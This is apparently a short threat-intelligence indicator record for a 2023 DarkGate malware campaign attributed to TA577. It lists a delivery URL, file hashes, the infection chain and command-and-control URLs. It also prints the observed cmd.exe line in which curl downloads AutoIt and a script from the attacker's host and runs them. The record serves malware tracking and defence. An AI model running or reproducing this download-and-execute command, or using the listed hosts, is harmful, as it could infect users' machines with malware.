11.10.2023 | Darkgate | TA577

*************************************************

.url https://arquivaae.com.br/ine/?
.zip bf2a69d4728af507440925f462a41bac0529dd70eec76ff8b5988bf510bea8ef
.vbs 1e8a6d34c0fe5a5ad2fc1d6ff7000bcf8efa0704c397cb6ef021c2692bf17fe6

*************************************************

url > zip > vbs

WScript.exe C:\Users\Admin\AppData\Local\Temp\Doc-94.vbs

cmd.exe f InStr(1,  WScript.ScriptFullName,"vbs", 1) > 0 Then:path = WScript.ScriptFullName:end if
'/c cd /d %temp% & curl -o Autoit3.exe http://whoernet.co.com:80 & curl -o dftxsm.au3 http://whoernet.co.com:80/msifvwjscyk & Autoit3.exe dftxsm.au3

curl -o Autoit3.exe http://whoernet.co.com:80 

curl -o dftxsm.au3 http://whoernet.co.com:80/msifvwjscyk 

Autoit3.exe dftxsm.au3

*************************************************

c2

http://whoernet.co.com/
http://whoernet.co.com/msifvwjscyk
http://whoernet.co.com/sbhbrq
